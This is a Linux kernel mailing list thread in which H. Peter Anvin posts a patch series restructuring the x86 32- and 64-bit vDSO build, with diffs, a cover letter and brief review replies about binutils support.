diff --git a/arch/x86/entry/vdso/common/Makefile.include b/arch/x86/entry/vdso/common/Makefile.include
new file mode 100644
index 000000000000..3514b4a6869b
--- /dev/null
+++ b/arch/x86/entry/vdso/common/Makefile.include
@@ -0,0 +1,89 @@
+# SPDX-License-Identifier: GPL-2.0
+#
+# Building vDSO images for x86.
+#
+
+# Include the generic Makefile to check the built vDSO:
+include $(srctree)/lib/vdso/Makefile.include
+
+obj-y += $(foreach x,$(vdsos-y),vdso$(x)-image.o)
+
+targets += $(foreach x,$(vdsos-y),vdso$(x)-image.c vdso$(x).so vdso$(x).so.dbg vdso$(x).lds)
+targets += $(vobjs-y)
+
+# vobjs-y with $(obj)/ prepended
+vobjs := $(addprefix $(obj)/,$(vobjs-y))
+
+# Options for vdso*.lds
+CPPFLAGS_VDSO_LDS := -P -C -I$(src)/..
+$(obj)/%.lds : KBUILD_CPPFLAGS += $(CPPFLAGS_VDSO_LDS)
+
+#
+# Options from KBUILD_[AC]FLAGS that should *NOT* be kept
+#
+flags-remove-y += \
+ -D__KERNEL__ -mcmodel=kernel -mregparm=3 \
+	-fno-pic -fno-PIC -fno-pie -fno-PIE \
+ -mfentry -pg \
+	$(RANDSTRUCT_CFLAGS) $(GCC_PLUGINS_CFLAGS) $(KSTACK_ERASE_CFLAGS) \
+ $(RETPOLINE_CFLAGS) $(CC_FLAGS_LTO) $(CC_FLAGS_CFI) \
+ $(PADDING_CFLAGS)
+
+#
+# Don't omit frame pointers for ease of userspace debugging, but do
+# optimize sibling calls.
+#
+flags-y += -D__DISABLE_EXPORTS
+flags-y += -DDISABLE_BRANCH_PROFILING
+flags-y += -DBUILD_VDSO
+flags-y += -I$(src)/.. -I$(srctree)
+flags-y += -O2 -fpic
+flags-y += -fno-stack-protector
+flags-y += -fno-omit-frame-pointer
+flags-y += -foptimize-sibling-calls
+flags-y += -fasynchronous-unwind-tables
+
+# Reset cf protections enabled by compiler default
+flags-y += $(call cc-option, -fcf-protection=none)
+flags-$(CONFIG_X86_USER_SHADOW_STACK) += $(call cc-option, -fcf-protection=return)
+# When user space IBT is supported, enable this.
+# flags-$(CONFIG_USER_IBT) += $(call cc-option, -fcf-protection=branch)
+
+flags-$(CONFIG_MITIGATION_RETPOLINE) += $(RETPOLINE_VDSO_CFLAGS)
+
+# These need to be conditional on $(vobjs) as they do not apply to
+# the output vdso*-image.o files which are standard kernel objects.
+$(vobjs) : KBUILD_AFLAGS := \
+ $(filter-out $(flags-remove-y),$(KBUILD_AFLAGS)) $(flags-y)
+$(vobjs) : KBUILD_CFLAGS := \
+ $(filter-out $(flags-remove-y),$(KBUILD_CFLAGS)) $(flags-y)
+
+#
+# The VDSO images are built using a special linker script.
+#
+VDSO_LDFLAGS := -shared --hash-style=both --build-id=sha1 --no-undefined \
+ $(call ld-option, --eh-frame-hdr) -Bsymbolic -z noexecstack
+
+quiet_cmd_vdso = VDSO $@
+ cmd_vdso = $(LD) -o $@ \
+ $(VDSO_LDFLAGS) $(VDSO_LDFLAGS_$*) \
+ -T $(filter %.lds,$^) $(filter %.o,$^)
+quiet_cmd_vdso_and_check = VDSO $@
+ cmd_vdso_and_check = $(cmd_vdso); $(cmd_vdso_check)
+
+$(obj)/vdso%.so.dbg: $(obj)/vdso%.lds FORCE
+ $(call if_changed,vdso_and_check)
+
+$(obj)/%.so: OBJCOPYFLAGS := -S --remove-section __ex_table
+$(obj)/%.so: $(obj)/%.so.dbg FORCE
+ $(call if_changed,objcopy)
+
+VDSO2C = $(objtree)/arch/x86/tools/vdso2c
+
+quiet_cmd_vdso2c = VDSO2C $@
+ cmd_vdso2c = $(VDSO2C) $< $(<:%.dbg=%) $@
+
+$(obj)/%-image.c: $(obj)/%.so.dbg $(obj)/%.so $(VDSO2C) FORCE
+ $(call if_changed,vdso2c)
+
+$(obj)/%-image.o: $(obj)/%-image.c
diff --git a/arch/x86/entry/vdso/vdso-note.S b/arch/x86/entry/vdso/common/note.S
similarity index 62%
rename from arch/x86/entry/vdso/vdso-note.S
rename to arch/x86/entry/vdso/common/note.S
index 79423170118f..2cbd39939dc6 100644
--- a/arch/x86/entry/vdso/vdso-note.S
+++ b/arch/x86/entry/vdso/common/note.S
@@ -1,13 +1,16 @@
+/* SPDX-License-Identifier: GPL-2.0 */
/*
* This supplies .note.* sections to go into the PT_NOTE inside the vDSO text.
* Here we can supply some information useful to userland.
*/
#include <linux/build-salt.h>
-#include <linux/uts.h>
#include <linux/version.h>
#include <linux/elfnote.h>
+/* Ideally this would use UTS_NAME, but using a quoted string here
+ doesn't work. Remember to change this when changing the
+ kernel's name. */
ELFNOTE_START(Linux, 0, "a")
.long LINUX_VERSION_CODE
ELFNOTE_END
diff --git a/arch/x86/entry/vdso/vclock_gettime.c b/arch/x86/entry/vdso/common/vclock_gettime.c
similarity index 100%
rename from arch/x86/entry/vdso/vclock_gettime.c
rename to arch/x86/entry/vdso/common/vclock_gettime.c
diff --git a/arch/x86/entry/vdso/vdso-layout.lds.S b/arch/x86/entry/vdso/common/vdso-layout.lds.S
similarity index 100%
rename from arch/x86/entry/vdso/vdso-layout.lds.S
rename to arch/x86/entry/vdso/common/vdso-layout.lds.S
diff --git a/arch/x86/entry/vdso/vgetcpu.c b/arch/x86/entry/vdso/common/vgetcpu.c
similarity index 100%
rename from arch/x86/entry/vdso/vgetcpu.c
rename to arch/x86/entry/vdso/common/vgetcpu.c
diff --git a/arch/x86/entry/vdso/vdso32/Makefile b/arch/x86/entry/vdso/vdso32/Makefile
new file mode 100644
index 000000000000..add6afb484ba
--- /dev/null
+++ b/arch/x86/entry/vdso/vdso32/Makefile
@@ -0,0 +1,24 @@
+# SPDX-License-Identifier: GPL-2.0
+#
+# 32-bit vDSO images for x86.
+#
+
+# The vDSOs built in this directory
+vdsos-y := 32
+
+# Files to link into the vDSO:
+vobjs-y := note.o vclock_gettime.o vgetcpu.o
+vobjs-y += system_call.o sigreturn.o
+
+# Compilation flags
+flags-y := -DBUILD_VDSO32 -m32 -mregparm=0
+flags-$(CONFIG_X86_64) += -include $(src)/fake_32bit_build.h
+flags-remove-y := -m64
+
+# The location of this include matters!
+include $(src)/../common/Makefile.include
+
+# Linker options for the vdso
+VDSO_LDFLAGS_32 := -m elf_i386 -soname linux-gate.so.1
+
+$(obj)/vdso32.so.dbg: $(vobjs)
diff --git a/arch/x86/entry/vdso/vdso32/note.S b/arch/x86/entry/vdso/vdso32/note.S
index 2cbd39939dc6..62d8aa51ce99 100644
--- a/arch/x86/entry/vdso/vdso32/note.S
+++ b/arch/x86/entry/vdso/vdso32/note.S
@@ -1,18 +1 @@
-/* SPDX-License-Identifier: GPL-2.0 */
-/*
- * This supplies .note.* sections to go into the PT_NOTE inside the vDSO text.
- * Here we can supply some information useful to userland.
- */
-
-#include <linux/build-salt.h>
-#include <linux/version.h>
-#include <linux/elfnote.h>
-
-/* Ideally this would use UTS_NAME, but using a quoted string here
- doesn't work. Remember to change this when changing the
- kernel's name. */
-ELFNOTE_START(Linux, 0, "a")
- .long LINUX_VERSION_CODE
-ELFNOTE_END
-
-BUILD_SALT
+#include "common/note.S"
diff --git a/arch/x86/entry/vdso/vdso32/system_call.S b/arch/x86/entry/vdso/vdso32/system_call.S
index d33c6513fd2c..2a15634bbe75 100644
--- a/arch/x86/entry/vdso/vdso32/system_call.S
+++ b/arch/x86/entry/vdso/vdso32/system_call.S
@@ -52,7 +52,7 @@ __kernel_vsyscall:
#define SYSENTER_SEQUENCE "movl %esp, %ebp; sysenter"
#define SYSCALL_SEQUENCE "movl %ecx, %ebp; syscall"
-#ifdef CONFIG_X86_64
+#ifdef BUILD_VDSO32_64
/* If SYSENTER (Intel) or SYSCALL32 (AMD) is available, use it. */
ALTERNATIVE_2 "", SYSENTER_SEQUENCE, X86_FEATURE_SYSENTER32, \
SYSCALL_SEQUENCE, X86_FEATURE_SYSCALL32
diff --git a/arch/x86/entry/vdso/vdso32/vclock_gettime.c b/arch/x86/entry/vdso/vdso32/vclock_gettime.c
index 86981decfea8..1481f0021b9f 100644
--- a/arch/x86/entry/vdso/vdso32/vclock_gettime.c
+++ b/arch/x86/entry/vdso/vdso32/vclock_gettime.c
@@ -1,4 +1 @@
-// SPDX-License-Identifier: GPL-2.0
-#define BUILD_VDSO32
-#include "fake_32bit_build.h"
-#include "../vclock_gettime.c"
+#include "common/vclock_gettime.c"
diff --git a/arch/x86/entry/vdso/vdso32/vdso32.lds.S b/arch/x86/entry/vdso/vdso32/vdso32.lds.S
index 8a3be07006bb..8a853543fc0d 100644
--- a/arch/x86/entry/vdso/vdso32/vdso32.lds.S
+++ b/arch/x86/entry/vdso/vdso32/vdso32.lds.S
@@ -11,7 +11,7 @@
#define BUILD_VDSO32
-#include "../vdso-layout.lds.S"
+#include "common/vdso-layout.lds.S"
/* The ELF entry point can be used to set the AT_SYSINFO value. */
ENTRY(__kernel_vsyscall);
diff --git a/arch/x86/entry/vdso/vdso32/vgetcpu.c b/arch/x86/entry/vdso/vdso32/vgetcpu.c
index 3a9791f5e998..00cc8325a020 100644
--- a/arch/x86/entry/vdso/vdso32/vgetcpu.c
+++ b/arch/x86/entry/vdso/vdso32/vgetcpu.c
@@ -1,3 +1 @@
-// SPDX-License-Identifier: GPL-2.0
-#include "fake_32bit_build.h"
-#include "../vgetcpu.c"
+#include "common/vgetcpu.c"
diff --git a/arch/x86/entry/vdso/vdso64/Makefile b/arch/x86/entry/vdso/vdso64/Makefile
new file mode 100644
index 000000000000..bfffaf1aeecc
--- /dev/null
+++ b/arch/x86/entry/vdso/vdso64/Makefile
@@ -0,0 +1,46 @@
+# SPDX-License-Identifier: GPL-2.0
+#
+# 64-bit vDSO images for x86.
+#
+
+# The vDSOs built in this directory
+vdsos-y := 64
+vdsos-$(CONFIG_X86_X32_ABI) += x32
+
+# Files to link into the vDSO:
+vobjs-y := note.o vclock_gettime.o vgetcpu.o
+vobjs-y += vgetrandom.o vgetrandom-chacha.o
+vobjs-$(CONFIG_X86_SGX) += vsgx.o
+
+# Compilation flags
+flags-y := -DBUILD_VDSO64 -m64 -mcmodel=small
+
+# The location of this include matters!
+include $(src)/../common/Makefile.include
+
+#
+# X32 processes use x32 vDSO to access 64bit kernel data.
+#
+# Build x32 vDSO image:
+# 1. Compile x32 vDSO as 64bit.
+# 2. Convert object files to x32.
+# 3. Build x32 VDSO image with x32 objects, which contain 64-bit code
+# so that it can reach 64bit address space with 64bit pointers.
+#
+
+# Convert 64bit object file to x32 for x32 vDSO.
+quiet_cmd_x32 = X32 $@
+ cmd_x32 = $(OBJCOPY) -O elf32-x86-64 $< $@
+
+$(obj)/%-x32.o: $(obj)/%.o FORCE
+ $(call if_changed,x32)
+
+vobjsx32 = $(patsubst %.o,%-x32.o,$(vobjs))
+targets += $(patsubst %.o,%-x32.o,$(vobjs-y))
+
+# Linker options for the vdso
+VDSO_LDFLAGS_64 := -m elf_x86_64 -soname linux-vdso.so.1 -z max-page-size=4096
+VDSO_LDFLAGS_x32 := $(subst elf_x86_64,elf32_x86_64,$(VDSO_LDFLAGS_64))
+
+$(obj)/vdso64.so.dbg: $(vobjs)
+$(obj)/vdsox32.so.dbg: $(vobjsx32)
diff --git a/arch/x86/entry/vdso/vdso64/note.S b/arch/x86/entry/vdso/vdso64/note.S
new file mode 100644
index 000000000000..62d8aa51ce99
--- /dev/null
+++ b/arch/x86/entry/vdso/vdso64/note.S
@@ -0,0 +1 @@
+#include "common/note.S"
diff --git a/arch/x86/entry/vdso/vdso64/vclock_gettime.c b/arch/x86/entry/vdso/vdso64/vclock_gettime.c
new file mode 100644
index 000000000000..1481f0021b9f
--- /dev/null
+++ b/arch/x86/entry/vdso/vdso64/vclock_gettime.c
@@ -0,0 +1 @@
+#include "common/vclock_gettime.c"
diff --git a/arch/x86/entry/vdso/vdso.lds.S b/arch/x86/entry/vdso/vdso64/vdso64.lds.S
similarity index 94%
rename from arch/x86/entry/vdso/vdso.lds.S
rename to arch/x86/entry/vdso/vdso64/vdso64.lds.S
index 0bab5f4af6d1..5ce3f2b6373a 100644
--- a/arch/x86/entry/vdso/vdso.lds.S
+++ b/arch/x86/entry/vdso/vdso64/vdso64.lds.S
@@ -9,7 +9,7 @@
#define BUILD_VDSO64
-#include "vdso-layout.lds.S"
+#include "common/vdso-layout.lds.S"
/*
* This controls what userland symbols we export from the vDSO.
diff --git a/arch/x86/entry/vdso/vdsox32.lds.S b/arch/x86/entry/vdso/vdso64/vdsox32.lds.S
similarity index 92%
rename from arch/x86/entry/vdso/vdsox32.lds.S
rename to arch/x86/entry/vdso/vdso64/vdsox32.lds.S
index 16a8050a4fb6..3dbd20c8dacc 100644
--- a/arch/x86/entry/vdso/vdsox32.lds.S
+++ b/arch/x86/entry/vdso/vdso64/vdsox32.lds.S
@@ -9,7 +9,7 @@
#define BUILD_VDSOX32
-#include "vdso-layout.lds.S"
+#include "common/vdso-layout.lds.S"
/*
* This controls what userland symbols we export from the vDSO.
diff --git a/arch/x86/entry/vdso/vdso64/vgetcpu.c b/arch/x86/entry/vdso/vdso64/vgetcpu.c
new file mode 100644
index 000000000000..00cc8325a020
--- /dev/null
+++ b/arch/x86/entry/vdso/vdso64/vgetcpu.c
@@ -0,0 +1 @@
+#include "common/vgetcpu.c"
diff --git a/arch/x86/entry/vdso/vgetrandom-chacha.S b/arch/x86/entry/vdso/vdso64/vgetrandom-chacha.S
similarity index 100%
rename from arch/x86/entry/vdso/vgetrandom-chacha.S
rename to arch/x86/entry/vdso/vdso64/vgetrandom-chacha.S
diff --git a/arch/x86/entry/vdso/vgetrandom.c b/arch/x86/entry/vdso/vdso64/vgetrandom.c
similarity index 91%
rename from arch/x86/entry/vdso/vgetrandom.c
rename to arch/x86/entry/vdso/vdso64/vgetrandom.c
index 430862b8977c..6a95d36b12d9 100644
--- a/arch/x86/entry/vdso/vgetrandom.c
+++ b/arch/x86/entry/vdso/vdso64/vgetrandom.c
@@ -4,7 +4,7 @@
*/
#include <linux/types.h>
-#include "../../../../lib/vdso/getrandom.c"
+#include "lib/vdso/getrandom.c"
ssize_t __vdso_getrandom(void *buffer, size_t len, unsigned int flags, void *opaque_state, size_t opaque_len)
{
diff --git a/arch/x86/entry/vdso/vsgx.S b/arch/x86/entry/vdso/vdso64/vsgx.S
similarity index 100%
rename from arch/x86/entry/vdso/vsgx.S
rename to arch/x86/entry/vdso/vdso64/vsgx.S
--
2.52.0
|
{
"author": "\"H. Peter Anvin\" <hpa@zytor.com>",
"date": "Tue, 16 Dec 2025 13:25:57 -0800",
"thread_id": "vdso-cleanup-patch-4.1@zytor.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/10] x86/entry/vdso: clean up the vdso build, vdso updates
|
This patchset cleans up the vdso build by building the 32- and 64-bit
vdsos in separate directories, moving the vdso2c tool to
arch/x86/tools, and by merging common code and especially Makefile
rules between the 32- and 64-bit vdsos to the greatest extent
possible.
Be more strict about sanitizing and standardizing the vdso build
options.
Disable CFI for the vdso until the kernel adds user space IBT support.
Modernize the DWARF generation in vdso32/sigreturn.S.
Add macros to cleanly call system calls from vdso source code.
Add the GNU_PROPERTY and GNU_STACK PHDRs to the vdso.
When using int $0x80 (old 32-bit hardware or FRED-capable 64-bit
hardware) skip the stack stuff in the 32-bit kernel entry code and
call int $0x80 directly when used from C code.
Changes from v3 to v4:
- Improved description of patch 01/10.
- Split out the move of vdso2c to tools into a separate patch.
- Remove unrelated formatting changes from vdso-layout.lds.S.
- Fix *-x32.o being missing from "targets".
- Rebased onto v6.19-rc1.
Changes from v2 to v3:
In arch/x86/include/asm/vdso/sys_call.h:
- remove stray comment from prototyping (Uros Bizjak)
- remove VDSO_SYSCALL6() since it would require special
handling on 32 bits with frame pointers and is
currently unused. (Uros Bizjak)
- indent nested preprocessor directives.
Changes from v1 to v2:
Too many to count - much of the patchset has been reworked
Patches:
x86/entry/vdso: rename vdso_image_* to vdso*_image
x86/entry/vdso: move vdso2c to arch/x86/tools
x86/entry/vdso: refactor the vdso build
x86/entry/vdso32: don't rely on int80_landing_pad for adjusting ip
x86/entry/vdso32: remove SYSCALL_ENTER_KERNEL macro in sigreturn.S
x86/entry/vdso32: remove open-coded DWARF in sigreturn.S
x86/entry/vdso: include GNU_PROPERTY and GNU_STACK PHDRs
x86/vdso: abstract out vdso system call internals
x86/cpufeature: replace X86_FEATURE_SYSENTER32 with X86_FEATURE_SYSFAST32
x86/entry/vdso32: when using int $0x80, use it directly
---
arch/x86/Kconfig.cpufeatures | 8 +
arch/x86/Makefile | 2 +-
arch/x86/entry/syscall_32.c | 2 +-
arch/x86/entry/vdso/.gitignore | 11 +-
arch/x86/entry/vdso/Makefile | 162 +--------------------
arch/x86/entry/vdso/common/Makefile.include | 89 +++++++++++
arch/x86/entry/vdso/{vdso-note.S => common/note.S} | 5 +-
arch/x86/entry/vdso/{ => common}/vclock_gettime.c | 0
arch/x86/entry/vdso/{ => common}/vdso-layout.lds.S | 38 +++--
arch/x86/entry/vdso/{ => common}/vgetcpu.c | 0
arch/x86/entry/vdso/vdso32/Makefile | 24 +++
arch/x86/entry/vdso/vdso32/note.S | 19 +--
arch/x86/entry/vdso/vdso32/sigreturn.S | 152 +++++--------------
arch/x86/entry/vdso/vdso32/system_call.S | 22 ++-
arch/x86/entry/vdso/vdso32/vclock_gettime.c | 5 +-
arch/x86/entry/vdso/vdso32/vdso32.lds.S | 2 +-
arch/x86/entry/vdso/vdso32/vgetcpu.c | 4 +-
arch/x86/entry/vdso/vdso64/Makefile | 46 ++++++
arch/x86/entry/vdso/vdso64/note.S | 1 +
arch/x86/entry/vdso/vdso64/vclock_gettime.c | 1 +
.../entry/vdso/{vdso.lds.S => vdso64/vdso64.lds.S} | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vdsox32.lds.S | 2 +-
arch/x86/entry/vdso/vdso64/vgetcpu.c | 1 +
.../entry/vdso/{ => vdso64}/vgetrandom-chacha.S | 0
arch/x86/entry/vdso/{ => vdso64}/vgetrandom.c | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vsgx.S | 0
arch/x86/entry/vdso/vma.c | 24 ++-
arch/x86/include/asm/cpufeatures.h | 2 +-
arch/x86/include/asm/dwarf2.h | 1 +
arch/x86/include/asm/elf.h | 2 +-
arch/x86/include/asm/vdso.h | 6 +-
arch/x86/include/asm/vdso/gettimeofday.h | 108 +-------------
arch/x86/include/asm/vdso/sys_call.h | 105 +++++++++++++
arch/x86/kernel/asm-offsets.c | 6 +
arch/x86/kernel/cpu/centaur.c | 3 -
arch/x86/kernel/cpu/common.c | 8 +
arch/x86/kernel/cpu/intel.c | 4 +-
arch/x86/kernel/cpu/zhaoxin.c | 4 +-
arch/x86/kernel/fred.c | 2 +-
arch/x86/kernel/process_64.c | 6 +-
arch/x86/kernel/signal_32.c | 4 +-
arch/x86/tools/Makefile | 15 +-
arch/x86/{entry/vdso => tools}/vdso2c.c | 0
arch/x86/{entry/vdso => tools}/vdso2c.h | 0
arch/x86/xen/setup.c | 28 ++--
arch/x86/xen/smp_pv.c | 5 +-
arch/x86/xen/xen-ops.h | 1 -
47 files changed, 444 insertions(+), 490 deletions(-)
|
On Tue, Dec 16, 2025 at 4:26 PM H. Peter Anvin <hpa@zytor.com> wrote:
Do we even still support the old linkers that need these constants?
Brian Gerst
|
{
"author": "Brian Gerst <brgerst@gmail.com>",
"date": "Wed, 17 Dec 2025 21:16:08 -0500",
"thread_id": "vdso-cleanup-patch-4.1@zytor.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/10] x86/entry/vdso: clean up the vdso build, vdso updates
|
|
On Wed, Dec 17, 2025 at 9:16 PM Brian Gerst <brgerst@gmail.com> wrote:
Digging into the binutils source, PT_GNU_EH_FRAME and PT_GNU_STACK
were added to the parser around bintils-2.15. PT_GNU_PROPERTY was
added in binutils-2.38, which is newer than the minimum supported
version of binutils-2.30.
Probably better to just leave them then.
Brian Gerst
|
{
"author": "Brian Gerst <brgerst@gmail.com>",
"date": "Thu, 18 Dec 2025 01:56:49 -0500",
"thread_id": "vdso-cleanup-patch-4.1@zytor.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/10] x86/entry/vdso: clean up the vdso build, vdso updates
|
|
On Tue, Dec 16, 2025 at 10:26 PM H. Peter Anvin <hpa@zytor.com> wrote:
Acked-by: Uros Bizjak <ubizjak@gmail.com>
|
{
"author": "Uros Bizjak <ubizjak@gmail.com>",
"date": "Tue, 6 Jan 2026 19:09:48 +0100",
"thread_id": "vdso-cleanup-patch-4.1@zytor.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/10] x86/entry/vdso: clean up the vdso build, vdso updates
|
|
When neither sysenter32 nor syscall32 is available (on either
FRED-capable 64-bit hardware or old 32-bit hardware), there is no
reason to do a bunch of stack shuffling in __kernel_vsyscall.
Unfortunately, just overwriting the initial "push" instructions will
mess up the CFI annotations, so suffer the 3-byte NOP if not
applicable.
Similarly, inline the int $0x80 when doing inline system calls in the
vdso instead of calling __kernel_vsyscall.
Signed-off-by: H. Peter Anvin (Intel) <hpa@zytor.com>
---
arch/x86/entry/vdso/vdso32/system_call.S | 18 ++++++++++++++----
arch/x86/include/asm/vdso/sys_call.h | 4 +++-
2 files changed, 17 insertions(+), 5 deletions(-)
diff --git a/arch/x86/entry/vdso/vdso32/system_call.S b/arch/x86/entry/vdso/vdso32/system_call.S
index 7b1c0f16e511..9157cf9c5749 100644
--- a/arch/x86/entry/vdso/vdso32/system_call.S
+++ b/arch/x86/entry/vdso/vdso32/system_call.S
@@ -14,6 +14,18 @@
ALIGN
__kernel_vsyscall:
CFI_STARTPROC
+
+ /*
+ * If using int $0x80, there is no reason to muck about with the
+ * stack here. Unfortunately just overwriting the push instructions
+ * would mess up the CFI annotations, but it is only a 3-byte
+ * NOP in that case. This could be avoided by patching the
+ * vdso symbol table (not the code) and entry point, but that
+ * would require a fair bit of tooling work, or by simply compiling
+ * two different vDSO images, but that doesn't seem worth it.
+ */
+ ALTERNATIVE "int $0x80; ret", "", X86_FEATURE_SYSFAST32
+
/*
* Reshuffle regs so that all of any of the entry instructions
* will preserve enough state.
@@ -52,11 +64,9 @@ __kernel_vsyscall:
#define SYSENTER_SEQUENCE "movl %esp, %ebp; sysenter"
#define SYSCALL_SEQUENCE "movl %ecx, %ebp; syscall"
- /* If SYSENTER (Intel) or SYSCALL32 (AMD) is available, use it. */
- ALTERNATIVE_2 "", SYSENTER_SEQUENCE, X86_FEATURE_SYSFAST32, \
- SYSCALL_SEQUENCE, X86_FEATURE_SYSCALL32
+ ALTERNATIVE SYSENTER_SEQUENCE, SYSCALL_SEQUENCE, X86_FEATURE_SYSCALL32
- /* Enter using int $0x80 */
+ /* Re-enter using int $0x80 */
int $0x80
SYM_INNER_LABEL(int80_landing_pad, SYM_L_GLOBAL)
diff --git a/arch/x86/include/asm/vdso/sys_call.h b/arch/x86/include/asm/vdso/sys_call.h
index dcfd17c6dd57..5806b1cd6aef 100644
--- a/arch/x86/include/asm/vdso/sys_call.h
+++ b/arch/x86/include/asm/vdso/sys_call.h
@@ -20,7 +20,9 @@
# define __sys_reg4 "r10"
# define __sys_reg5 "r8"
#else
-# define __sys_instr "call __kernel_vsyscall"
+# define __sys_instr ALTERNATIVE("ds;ds;ds;int $0x80", \
+ "call __kernel_vsyscall", \
+ X86_FEATURE_SYSFAST32)
# define __sys_clobber "memory"
# define __sys_nr(x,y) __NR_ ## x ## y
# define __sys_reg1 "ebx"
--
2.52.0
|
{
"author": "\"H. Peter Anvin\" <hpa@zytor.com>",
"date": "Tue, 6 Jan 2026 13:18:43 -0800",
"thread_id": "vdso-cleanup-patch-4.1@zytor.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/10] x86/entry/vdso: clean up the vdso build, vdso updates
|
|
Currently the vdso doesn't include .note.gnu.property or a GNU noexec
stack annotation (the -z noexecstack in the linker script is
ineffective because we specify PHDRs explicitly.)
The motivation is that the dynamic linker currently does not check
these.
However, this is a weak excuse: the vdso*.so are also supposed to be
usable as link libraries, and there is no reason why the dynamic
linker might not want or need to check these in the future, so add
them back in -- it is trivial enough.
Use symbolic constants for the PHDR permission flags.
[ v4: drop unrelated formatting changes ]
[ v4.1: drop one last bogus formatting change (Brian Gerst) ]
Signed-off-by: H. Peter Anvin (Intel) <hpa@zytor.com>
---
arch/x86/entry/vdso/common/vdso-layout.lds.S | 36 ++++++++++++--------
1 file changed, 22 insertions(+), 14 deletions(-)
diff --git a/arch/x86/entry/vdso/common/vdso-layout.lds.S b/arch/x86/entry/vdso/common/vdso-layout.lds.S
index ec1ac191a057..f050fd723712 100644
--- a/arch/x86/entry/vdso/common/vdso-layout.lds.S
+++ b/arch/x86/entry/vdso/common/vdso-layout.lds.S
@@ -47,18 +47,18 @@ SECTIONS
*(.gnu.linkonce.b.*)
} :text
- /*
- * Discard .note.gnu.property sections which are unused and have
- * different alignment requirement from vDSO note sections.
- */
- /DISCARD/ : {
+ .note.gnu.property : {
*(.note.gnu.property)
- }
- .note : { *(.note.*) } :text :note
-
- .eh_frame_hdr : { *(.eh_frame_hdr) } :text :eh_frame_hdr
- .eh_frame : { KEEP (*(.eh_frame)) } :text
+ } :text :note :gnu_property
+ .note : {
+ *(.note*)
+ } :text :note
+ .eh_frame_hdr : { *(.eh_frame_hdr) } :text :eh_frame_hdr
+ .eh_frame : {
+ KEEP (*(.eh_frame))
+ *(.eh_frame.*)
+ } :text
/*
* Text is well-separated from actual data: there's plenty of
@@ -87,15 +87,23 @@ SECTIONS
* Very old versions of ld do not recognize this name token; use the constant.
*/
#define PT_GNU_EH_FRAME 0x6474e550
+#define PT_GNU_STACK 0x6474e551
+#define PT_GNU_PROPERTY 0x6474e553
/*
* We must supply the ELF program headers explicitly to get just one
* PT_LOAD segment, and set the flags explicitly to make segments read-only.
*/
+#define PF_R FLAGS(4)
+#define PF_RW FLAGS(6)
+#define PF_RX FLAGS(5)
+
PHDRS
{
- text PT_LOAD FLAGS(5) FILEHDR PHDRS; /* PF_R|PF_X */
- dynamic PT_DYNAMIC FLAGS(4); /* PF_R */
- note PT_NOTE FLAGS(4); /* PF_R */
- eh_frame_hdr PT_GNU_EH_FRAME;
+ text PT_LOAD PF_RX FILEHDR PHDRS;
+ dynamic PT_DYNAMIC PF_R;
+ note PT_NOTE PF_R;
+ eh_frame_hdr PT_GNU_EH_FRAME PF_R;
+ gnu_stack PT_GNU_STACK PF_RW;
+ gnu_property PT_GNU_PROPERTY PF_R;
}
--
2.52.0
|
{
"author": "\"H. Peter Anvin\" <hpa@zytor.com>",
"date": "Tue, 6 Jan 2026 13:18:40 -0800",
"thread_id": "vdso-cleanup-patch-4.1@zytor.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/10] x86/entry/vdso: clean up the vdso build, vdso updates
|
This patchset cleans up the vdso build by building the 32- and 64-bit
vdsos in separate directories, moving the vdso2c tool to
arch/x86/tools, and by merging common code and especially Makefile
rules between the 32- and 64-bit vdsos to the greatest extent
possible.
Be more strict about sanitizing and standardizing the vdso build
options.
Disable CFI for the vdso until the kernel adds user space IBT support.
Modernize the DWARF generation vdso32/sigreturn.S.
Add macros to cleanly call system calls from vdso source code.
Add the GNU_PROPERTY and GNU_STACK PHDRs to the vdso.
When using int $0x80 (old 32-bit hardware or FRED-capable 64-bit
hardware) skip the stack stuff in the 32-bit kernel entry code and
call int $0x80 directly when used from C code.
Changes from v3 to v4:
- Improved description of patch 01/10.
- Split out the move of vdso2c to tools into a separate patch.
- Remove unrelated formatting changes from vdso-layout.lds.S.
- Fix *-x32.o being missing from "targets".
- Rebased onto v6.19-rc1.
Changes from v2 to v3:
In arch/x86/include/asm/vdso/sys_call.h:
- remove stray comment from prototyping (Uros Bizjak)
- remove VDSO_SYSCALL6() since it would require special
handling on 32 bits with frame pointers and is
currently unused. (Uros Bizjak)
- indent nested preprocessor directives.
Changes from v1 to v2:
Too many to count - much of the patchset has been reworked
Patches:
x86/entry/vdso: rename vdso_image_* to vdso*_image
x86/entry/vdso: move vdso2c to arch/x86/tools
x86/entry/vdso: refactor the vdso build
x86/entry/vdso32: don't rely on int80_landing_pad for adjusting ip
x86/entry/vdso32: remove SYSCALL_ENTER_KERNEL macro in sigreturn.S
x86/entry/vdso32: remove open-coded DWARF in sigreturn.S
x86/entry/vdso: include GNU_PROPERTY and GNU_STACK PHDRs
x86/vdso: abstract out vdso system call internals
x86/cpufeature: replace X86_FEATURE_SYSENTER32 with X86_FEATURE_SYSFAST32
x86/entry/vdso32: when using int $0x80, use it directly
---
arch/x86/Kconfig.cpufeatures | 8 +
arch/x86/Makefile | 2 +-
arch/x86/entry/syscall_32.c | 2 +-
arch/x86/entry/vdso/.gitignore | 11 +-
arch/x86/entry/vdso/Makefile | 162 +--------------------
arch/x86/entry/vdso/common/Makefile.include | 89 +++++++++++
arch/x86/entry/vdso/{vdso-note.S => common/note.S} | 5 +-
arch/x86/entry/vdso/{ => common}/vclock_gettime.c | 0
arch/x86/entry/vdso/{ => common}/vdso-layout.lds.S | 38 +++--
arch/x86/entry/vdso/{ => common}/vgetcpu.c | 0
arch/x86/entry/vdso/vdso32/Makefile | 24 +++
arch/x86/entry/vdso/vdso32/note.S | 19 +--
arch/x86/entry/vdso/vdso32/sigreturn.S | 152 +++++--------------
arch/x86/entry/vdso/vdso32/system_call.S | 22 ++-
arch/x86/entry/vdso/vdso32/vclock_gettime.c | 5 +-
arch/x86/entry/vdso/vdso32/vdso32.lds.S | 2 +-
arch/x86/entry/vdso/vdso32/vgetcpu.c | 4 +-
arch/x86/entry/vdso/vdso64/Makefile | 46 ++++++
arch/x86/entry/vdso/vdso64/note.S | 1 +
arch/x86/entry/vdso/vdso64/vclock_gettime.c | 1 +
